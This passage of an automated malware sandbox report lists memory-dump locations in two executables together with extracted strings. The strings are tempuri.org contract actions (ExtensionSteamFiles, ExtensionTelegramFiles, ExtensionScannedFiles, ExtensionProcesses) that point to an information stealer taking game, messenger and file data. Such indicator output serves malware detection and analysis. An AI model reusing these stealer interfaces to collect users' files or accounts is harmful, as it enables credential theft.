                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionProcessesLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionProcessesResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionProcessesResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionScannedFiles
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionScannedFilesLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionScannedFilesResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionScannedFilesResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionSteamFiles
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionSteamFilesLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionSteamFilesResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionSteamFilesResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionTelegramFiles
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionTelegramFilesLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionTelegramFilesResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionTelegramFilesResponseH9
